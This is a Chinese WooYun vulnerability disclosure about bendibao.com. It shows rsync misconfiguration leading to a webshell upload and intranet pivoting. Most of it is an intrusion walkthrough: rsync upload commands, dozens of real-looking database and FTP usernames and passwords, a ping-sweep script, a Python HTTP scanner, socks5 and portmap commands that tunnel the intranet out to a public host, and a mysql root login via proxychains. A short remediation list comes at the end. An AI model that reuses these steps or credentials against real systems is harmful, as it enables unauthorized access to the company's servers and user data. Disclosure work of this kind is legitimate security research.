当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0146277

漏洞标题:本地宝某处漏洞导致内网漫游(涉及数据库及大量源码)

相关厂商:bendibao.com

漏洞作者: 1c3z

提交时间:2015-10-13 10:09

修复时间:2015-10-18 10:10

公开时间:2015-10-18 10:10

漏洞类型:系统/服务运维配置不当

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-13: 细节已通知厂商并且等待厂商处理中
2015-10-18: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

库太多,不知道有多少用户。

详细说明:

rsync www.bendibao.com::

选区_036.png


然后找个有写权限的目录把马传上去
rsync -av 1.php www.bendibao.com::webshequ/test/
http://shequ.sz.bendibao.com/test/1.php 密码aa
分站太多了。。

选区_053.png


收集下数据库的信息:
这里只是一小部分。。
/web/shequ/config/config_global.php
$_config['db']['1']['dbhost'] = '192.168.1.200';
$_config['db']['1']['dbuser'] = 'bdbshequ';
$_config['db']['1']['dbpw'] = '25411982';
/web/shequ/config/config_global.php
array (
'host' => '192.168.1.110',
'user' => 'xmbdbinfo_user',
'pass' => 'v6fhC69GZFTPXnxu',
'name' => 'tybdbinfo',
),
'dz_db' =>
array (
'host' => '192.168.1.110',
'user' => 'whbdbinfo_db',
'pass' => 'DS7uQMvPT2TT3rWf',
'name' => 'dazhe',
),
/web/wulumuqi/config/system.php
$INI = array (
'db' =>
array (
'host' => '192.168.1.110',
'user' => 'waidibdb_usr',
'pass' => 'FqmbbSBCdtPyM8Cc',
'name' => 'wlmqbdbinfo',
),
/web/chengdu/config/system.php
'db' =>
array (
'host' => '192.168.1.110',
'user' => 'cdbdbinfo_db',
'pass' => 'mtQneVBfCTGcySSH',
'name' => 'cdbdbinfo',
),
'db2' =>
array (
'host' => '192.168.1.110',
'user' => 'whbdbinfo_db',
'pass' => 'DS7uQMvPT2TT3rWf',
'name' => 'postcode',
),
/web/www/config/config_global.php
$_config['db']['1']['dbhost'] = '192.168.1.107';
$_config['db']['1']['dbuser'] = 'bdbshequ';
$_config['db']['1']['dbpw'] = '25411982';
$_config['db']['1']['dbcharset'] = 'utf8';
$_config['db']['1']['pconnect'] = '0';
$_config['db']['1']['dbname'] = 'bdbshequ';
$_config['db']['1']['tablepre'] = 'shequ';
/web/wap/touch/config/sz.php
'db'=>array(
'host'=> '183.60.137.14,2433',
'user'=> 'wsl@bendibao.com',
'password'=> 'wsl@bdb',
'name'=> 'szadinfo',
'provider'=> 'mssql',
/web/wap/touch/config/wh.php
'db'=>array(
'host'=> '183.60.137.17',
'user'=> 'whbdbinfo_db',
'password'=> 'DS7uQMvPT2TT3rWf',
'name'=> 'whbdbinfo',
'provider'=> 'mysql',
),
/web/waidiwap/config/qth_config.php
$INI = array (
'db' =>
array (
'host' => '192.168.1.200',
'user' => 'qthbdbinfo_db',
'pass' => 'xDzQ6T1h3I2h4SsM',
'name' => 'qthbdbinfo',
),
);
ftp用户名密码:
/etc/vsftpd/vuser_passwd.txt 奇行是用户名,偶行是密码
jiahai12
jiahai2541
jiahai
jiahai#2541
xiaohei
xiaohei#2541
wusl
wsl@bdb.2541
yuding
yuding@bdb
hansen
hswhansen77
loutongwh
loutong#3657@hsw
loutongcd
loutong#3657@hsw
haitun
haitun#ht
通关命令netstat -an,发现与内网连接的机子
192.168.1.200:3306
192.168.1.201:3306
192.168.1.110:11211
192.168.1.107:3306
发现一个通用用户名密码
bdbshequ 25411982
菜刀连上,发现都长的差不多,
400多个库

选区_037.png


数据库用户也这么多

选区_039.png


内网探测下存活主机,扫描有点慢。。

bash pingall.sh  192.168.1 1 255 > host.txt
//pingall.sh
#!/bin/bash
for i in `seq ${2} ${3}`
do
ping -c 1 ${1}.${i} > /dev/null 2>&1
if [ $? -eq 0 ]; then
echo "${1}.${i}"
fi
done


存活主机

192.168.1.101
192.168.1.102
192.168.1.103
192.168.1.104
192.168.1.105
192.168.1.106
192.168.1.107
192.168.1.108
192.168.1.109
192.168.1.110
192.168.1.112
192.168.1.168
192.168.1.200
192.168.1.201


扫下http服务

import urllib2
from multiprocessing.dummy import Pool as ThreadPool
import socket
socket.setdefaulttimeout(5)
def have_http(host):
host = host.strip().rstrip('/')
print host
ports = ['80','81','82','83','8080','8081','9090','9092','8888','88','8083']
for port in ports:
url = 'http://' + host +":" +port +'/'
try:
text = urllib2.urlopen(url).read()
if '<' in text:
file('have_http','a').write(url + '\n')
except Exception, e:
pass
def poc(fun,name='host'):
pool = ThreadPool(10)
targets = file(name)
pool.map(fun, targets)
pool.close()
pool.join()
if __name__ == '__main__':
poc(have_http)


http://192.168.1.109:80/
http://192.168.1.106:8080/
http://192.168.1.168:80/
http://192.168.1.110:8080/
http://192.168.1.107:8080/
http://192.168.1.200:8080/


后来测试了下,也就上面跑着一个管理系统,http://192.168.1.168:80/。但是在我这边看起来是坏的。。
接下来端口扫描,但是我没扫。。
插入内网。。
在内网开个socks5的服务
https://gist.github.com/yaonie/2490851
然后用portmap,做端口转发,反弹出来。虽然主机有公网IP,但是好像有墙。
内网机子 python s5.py 8282
再公网主机执行,./portmap -m 2 -p1 2222 -p2 2223
内网,./portmap -m 3 -h1 公网IP -p1 2222 -h2 127.0.0.1 -p2 8282
然后就有了个监听在2223的socks5的服务

选区_040.png


配置下proxychains-ng
memcached

选区_042.png


rsync 竟然没权限

选区_054.png


rsync数据库备份信息

选区_044.png


选区_047.png


选区_048.png


选区_046.png


ftp 匿名账号

选区_049.png


ftp ,利用前面收集的信息登录

选区_050.png


选区_051.png


在shell脚本中翻到另一台mysql主机
proxychains4 mysql -h183.60.137.94 -uroot -pbdb#jiahai2541

选区_052.png


rsync 183.60.137.17::
另一台公网中的rsync

选区_055.png


漏洞证明:

如上

修复方案:

1.不用使用同一个密码
2.rsync要配置密码,最好限制下ip
3.子站子间要隔离好,不然容易一锅端

版权声明:转载请注明来源 1c3z@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-10-18 10:10

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无


漏洞评价:

评论